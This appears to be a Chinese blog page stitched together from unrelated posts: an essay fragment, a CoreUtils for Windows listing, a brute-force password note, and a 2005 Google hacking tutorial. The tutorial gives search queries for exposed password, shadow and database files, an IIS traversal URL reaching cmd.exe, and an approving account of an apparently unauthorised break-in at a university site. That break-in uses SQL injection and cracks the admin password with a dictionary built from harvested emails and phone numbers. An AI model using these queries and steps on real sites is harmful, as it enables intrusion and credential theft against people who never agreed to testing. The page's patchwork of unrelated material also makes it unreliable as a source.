(這又回應到前面的第一點了!)

一般IT人 員的防禦多半僅止於對已知弱點的防禦,
所以對未知弱點的防禦是非常脆弱的。
但透過間接的防禦與監控機制,
其實還是常可以發現到一 些異常的軌跡,
並在進一步分析後獲取有用的資訊。
(雖然通常都是在出事了之後...)

最後,當然不能忽略了「人」這個最 大的變數,
套句a1t大大的話,人是最難patch的弱點,
也是永遠存在的0-day,
所以透過社交工程的攻擊手法依舊歷久彌 新,
始終存在著很大的殺傷力!



當然還有很多攻擊者與防守者不一樣的視野跟觀點,
不過顯然我還不夠黑,
這 些就有勞各位黑客大大加以補充了!

Analyzing Word and Excel Encryption

Analyzing Word and Excel Encryption



Analyzing Word and Excel Encryption

CoreUtils for Windows

以下為可以在windows下執行的Linux 命令列工具


CoreUtils for Windows

 

CoreUtils: collection of basic file, shell and text manipulation utilities

Version 5.3.0

Description

The GNU Core Utilities are the basic file, shell and text manipulation utilities of the GNU operating system. These are the core utilities which are expected to exist on every operating system.
File utilities:
  • chgrp: Changes file group ownership.
  • chown: Changes file ownership.
  • chmod: Changes file permissions.
  • cp: Copies files.
  • dd: Copies and converts a file.
  • df: Shows disk free space on filesystems.
  • dir: Gives a brief directory listing.
  • dircolors: Setup program for the color output of GNU ls.
  • du: Shows disk usage on filesystems.
  • install: Copies file and sets its permissions.
  • ln: Creates file links.
  • ls: Lists directory contents.
  • mkdir: Creates directories.
  • mkfifo: Creates FIFOs (named pipes).
  • mknod: Creates special files.
  • mv: Moves files.
  • rm: Removes (deletes) files.
  • rmdir: Removes empty directories.
  • shred: Destroy data in files.
  • sync: Synchronizes filesystem buffers and disk.
  • touch: Changes file timestamps.
  • vdir: Long directory listing.
Text utilities:
  • cat: concatenates and prints files on the standard output
  • cksum: checksum and count the bytes in a file
  • comm: compares two sorted files line by line
  • csplit: splits a file into sections determined by context lines
  • cut: remove sections from each line of files
  • expand: convert tabs to spaces
  • fmt: simple optimal text formatter
  • fold: wrap each input line to fit in specified width
  • head: output the first part of files
  • join: join lines of two files on a common field
  • md5sum: compute and check MD5 messsage digest
  • nl: number lines of files
  • od: dump files in octal and other formats
  • paste: merge lines of files
  • ptx: produce a permuted index of file contents
  • pr: convert text files for printing
  • shasum: compute and check SHA1 message digest
  • sort: sort lines of text files
  • split: split a file into pieces
  • sum: checksum and count the blocks in a file
  • tac: concatenates and prints files in reverse
  • tail: outputs the last part of files
  • tr: translates or deletes characters
  • tsort: perform topological sort
  • unexpand: convert spaces to tabs
  • uniq: remove duplicate lines from a sorted file
  • wc: prints the number of bytes, words, and lines in files
Shell utilities:
  • [ - Check file types and compare values
  • basename - Removes the path prefix from a given pathname.
  • chroot - Changes the root directory.
  • date - Prints/sets the system date and time.
  • dirname - Removes the last level or filename from a given pathname.
  • echo - Prints a line of text.
  • env - Displays/modifies the environment.
  • expr - Evaluates expressions.
  • factor - Prints prime factors.
  • false - Returns an unsuccessful exit status.
  • groups - Print the groups that the user is a member of.
  • hostid - Print the numeric identifier for the current host
  • hostname - Print or set the machine name.
  • id - Print real/effective uid/gid.
  • logname - Print current login name.
  • nice - Modify scheduling priority.
  • nohup - Allows a command to continue running after logging out.
  • pathchk - Check file name portability.
  • pinky - Lightweight finger
  • printenv - Prints environment variables.
  • printf - Formats and prints data.
  • pwd - Print the current working directory.
  • seq - Print numeric sequences.
  • sleep - Suspends execution for a specified time.
  • stty - Print/change terminal settings.
  • su - Allows you to adopt the id of another user or superuser.
  • tee - Sends output to multiple files.
  • test - Evaluates an expression.
  • true - Returns a successful exit status.
  • tty - Print terminal name.
  • uname - Print system information.
  • users - Print current user names.
  • who - Print a list of all users currently logged in.
  • whoami - Print effective user id.
  • yes - Print a string repeatedly.

Homepage

Download

If you download the Setup program of the package, any requirements for running applications, such as dynamic link libraries (DLL's) from the dependencies as listed below under Requirements, are already included. If you download the package as Zip files, then you must download and install the dependencies zip file yourself. Developer files (header files and libraries) from other packages are however not included; so if you wish to develop your own applications, you must separately install the required packages.
Description
Download
Size
Last change
Md5sum
• Complete package, except sourcesSetup643988221 April 20055a3e9d30b906dadf54de0635522fd62c
• SourcesSetup352775521 April 200564b8f7c03895de29c6ee669c9092fe1b

• BinariesZip517699621 April 2005aa7ce7f1f2befb930fb156bddea41bc4
• DependenciesZip70664121 April 20056cf05855b6902dffa2cf4ba8b90e82e6
• DocumentationZip454092421 April 2005ee0b456daf011d6e348cc64adafe968a
• SourcesZip937172021 April 20055cbd86c56e6eb29b6af2810849d08c8c

你的網路密碼安全嗎?

你的網路密碼安全嗎?


破解密碼,除了木馬、偷看的方法外,暴力破解是一種很可怕方法。

暴力破解(Brute force attack)是一種針對於密碼的破譯方法。這種方法很象數學上的「完全歸納法」並在密碼破譯方面得到了廣泛的應用。簡單來說 就是將密碼進行逐個推算直到找出真正的密碼為止。比如一個四位並且全部由數字組成其密碼共有10000種組合,也就是說最多我們會嘗試10000次才能找 到真正的密碼。利用這種方法我們可以運用電腦來進行逐個推算,也就是說用我們破解任何一個密碼也都只是一個時間問題。

下面我們看看用P4  3.0處理器暴力破解本機密碼的時間,提醒朋友加強自己的密碼。
分別從密碼的長度、字母或者數字的組合、以及大小寫來測試。

一個符號+數字+大小寫字母的6位密碼「g[-4JZ」暴力破解時間為9天,而一個純數字的10位密碼 「9331805050」暴力破解時間2.4小時。

Google Hacking 簡單介紹

google hacking其實並算不上什麼新東西,在早幾年我在一些國外站點上就看見過相關的介紹,但是由於當時並沒有重視這種技術,認為最多就只是用來找找未改名 的mdb或者別人留下的webshell什麼的,並無太大實際用途.但是前段時間仔細啃了些資料才猛然發覺google hacking其實並非如此簡單...

google hacking的簡單實現

記得以前看見過一篇文章寫的就是簡單的通過用www.google.com來搜索dvbbs6.mdb或conn.inc來獲得一些站點的敏感信息.其實 使用google中的一些語法可以提供給我們更多的信息(當然也提供給那些習慣攻擊的人更多他們所想要的.),下面就來介紹一些常用的語法.

intext:
這個就是把網頁中的正文內容中的某個字符做為搜索條件.例如在google裡輸入:intext:動網.將返回所有在網頁正文部分包含"動網"的網 頁.allintext:使用方法和intext類似.

intitle:
和上面那個intext差不多,搜索網頁標題中是否有我們所要找的字符.例如搜索:intitle:安全天使.將返回所有網頁標題中包含"安全天使"的網 頁.同理allintitle:也同intitle類似.

cache:
搜索google裡關於某些內容的緩存,有時候也許能找到一些好東西哦.

define:
搜索某個詞語的定義,搜索:define:hacker,將返回關於hacker的定義.

filetype:
這個我要重點推薦一下,無論是撒網式攻擊還是我們後面要說的對特定目標進行信息收集都需要用到這個.搜索指定類型的文件.例如輸 入:filetype:doc.將返回所有以doc結尾的文件URL.當然如果你找.bak、.mdb或.inc也是可以的,獲得的信息也許會更豐富:)

info:
查找指定站點的一些基本信息.

inurl:
搜索我們指定的字符是否存在於URL中.例如輸入:inurl:admin,將返回N個類似於這樣的連接:http://www.xxx.com/xxx /admin,用來找管理員登陸的URL不錯.allinurl也同inurl類似,可指定多個字符.

link:
例如搜索:inurl:www.4ngel.net可以返回所有和www.4ngel.net做了鏈接的URL.

site:
這個也很有用,例如:site:www.4ngel.net.將返回所有和4ngel.net這個站有關的URL.
對了還有一些操作符也是很有用的:
+ 把google可能忽略的字列如查詢範圍
- 把某個字忽略
~ 同意詞
. 單一的通配符
* 通配符,可代表多個字母
"" 精確查詢

下面開始說說實際應用(我個人還是比較習慣用google.com,以下內容均在google上搜索),對於一個居心叵測的攻擊者來說,可能他最感興趣的 就是密碼文件了.而google正因為其強大的搜索能力往往會把一些敏感信息透露給他們.用google搜索以下內容:
intitle:"index of" etc
intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
"# -FrontPage-" inurl:service.pwd
有時候因為各種各樣的原因一些重要的密碼文件被毫無保護的暴露在網絡上,如果被別有用心的人獲得,那麼危害是很大的.下面是我找到的一個FreeBSD系 統的passwd文件(我已做過處理):


圖一

同樣可以用google來搜索一些具有漏洞的程序,例如ZeroBoard前段時間發現個文件代碼洩露漏洞,我們可以用google來找網上使用這套程序 的站點:
intext:ZeroBoard filetype:php
或者使用:
inurl:outlogin.php?_zb_path= site:.jp
來尋找我們所需要的頁面.phpmyadmin是一套功能強大的數據庫操作軟件,一些站點由於配置失誤,導致我們可以不使用密碼直接對 phpmyadmin進行操作.我們可以用google搜索存在這樣漏洞的程序URL:
intitle:phpmyadmin intext:Create new database


圖二

還記得http://www.xxx.com/_vti_bin/..%5C..%5C....m32/cmd.exe?dir嗎?用google找找, 你也許還可以找到很多古董級的機器。同樣我們可以用這個找找有其他cgi漏洞的頁面。
allinurl:winnt system32


圖三

前面我們已經簡單的說過可以用google來搜索數據庫文件,用上一些語法來精確查找能夠獲得更多東西(access的數據庫,mssql、mysql的 連接文件等等).舉個例子示例一下:

allinurl:bbs data
filetype:mdb inurl:database
filetype:inc conn
inurl:data filetype:mdb
intitle:"index of" data //在一些配置不正確的apache+win32的服務器上經常出現這種情況
和上面的原理一樣,我們還可以用google來找後台,方法就略了,舉一反三即可,畢竟我寫這篇文章的目的是讓大家瞭解google hacking,而不是讓你用google去破壞.安全是把雙刃劍,關鍵在於你如何去運用.
利用google完全是可以對一個站點進行信息收集和滲透的,下面我們用google對特定站點進行一次測試。www.xxxx.com是全國著名大學之 一,一次偶然的機會我決定對其站點進行一次測試(文中所涉及該學校的信息均已經過處理,請勿對號入座:).
首先用google先看這個站點的一些基本情況(一些細節部分就略去了):
site:xxxx.com
從返回的信息中,找到幾個該校的幾個系院的域名:
http://a1.xxxx.com
http://a2.xxxx.com
http://a3.xxxx.com
http://a4.xxxx.com
順便ping了一下,應該是在不同的服務器.(想想我們學校就那一台可憐的web服務器,大學就是有錢,汗一個)。學校一般都會有不少好的資料,先看看有 什麼好東西沒:
site:xxxx.com filetype:doc
得到N個不錯的doc。先找找網站的管理後台地址:
site:xxxx.com intext:管理
site:xxxx.com inurl:login
site:xxxx.com intitle:管理
超過獲得2個管理後台地址:
http://a2.xxxx.com/sys/admin_login.asp
http://a3.xxxx.com:88/_admin/login_in.asp
還算不錯,看看服務器上跑的是什麼程序:
site:a2.xxxx.com filetype:asp
site:a2.xxxx.com filetype:php
site:a2.xxxx.com filetype:aspx
site:a3.xxxx.com filetype:asp
site:.......
......
a2服務器用的應該是IIS,上面用的是asp的整站程序,還有一個php的論壇
a3服務器也是IIS,aspx+asp。web程序都應該是自己開發的。有論壇那就看看能不能遇見什麼公共的FTP帳號什麼的:
site:a2.xxxx.com intext:ftp://*:*
沒找到什麼有價值的東西。再看看有沒有上傳一類的漏洞:
site:a2.xxxx.com inurl:file
site:a3.xxxx.com inurl:load
在a2上發現一個上傳文件的頁面:
http://a2.xxxx.com/sys/uploadfile.asp
用IE看了一下,沒權限訪問。試試注射,
site:a2.xxxx.com filetype:asp
得到N個asp頁面的地址,體力活就讓軟件做吧,這套程序明顯沒有對注射做什麼防範,dbowner權限,雖然不高但已足矣,back a shell我不太喜歡,而且看起來數據庫的個頭就不小,直接把web管理員的密碼暴出來再說,MD5加密過。一般學校的站點的密碼都比較有規律,通常都是 域名+電話一類的變形,用google搞定吧。
site:xxxx.com //得到N個二級域名
site:xxxx.com intext:*@xxxx.com //得到N個郵件地址,還有郵箱的主人的名字什麼的
site:xxxx.com intext:電話 //N個電話
把什麼的信息做個字典吧,掛上慢慢跑。過了一段時間就跑出4個帳號,2個是學生會的,1個管理員,還有一個可能是老師的帳號。登陸上去:
name:網站管理員
pass:a2xxxx7619 //說了吧,就是域名+4個數字
要再怎麼提權那就不屬於本文討論訪問了,呵呵,到此為止。
關於google hacking的防範
以前我們站的曉風·殘月寫過一篇躲避google的文章,原理就是通過在站點根目錄下建立一個robots.txt以避免網絡機器人獲得一些敏感的信息, 具體大家看原文章:
http://www.4ngel.net/article/26.htm
不過這種方法我個人不推薦,有點此地無銀三百兩的味道。簡單一點的方法就是上google把自己站點的一些信息刪除掉,訪問這個URL:
http://www.google.com/remove.html
前幾天看見又有人討論用程序來欺騙robot的方法,我覺得可以試試,代碼如下:

<?
if (strstr($_SERVER['HTTP_USER_AGENT'], "Googlebot"))
{
header("HTTP/1.1 301");
header("Location: http://www.google.com");
}
?>



本文作者:sniper
文章性質:原創
發佈日期:2005-02-26
http://www.4ngel.net/article/51.htm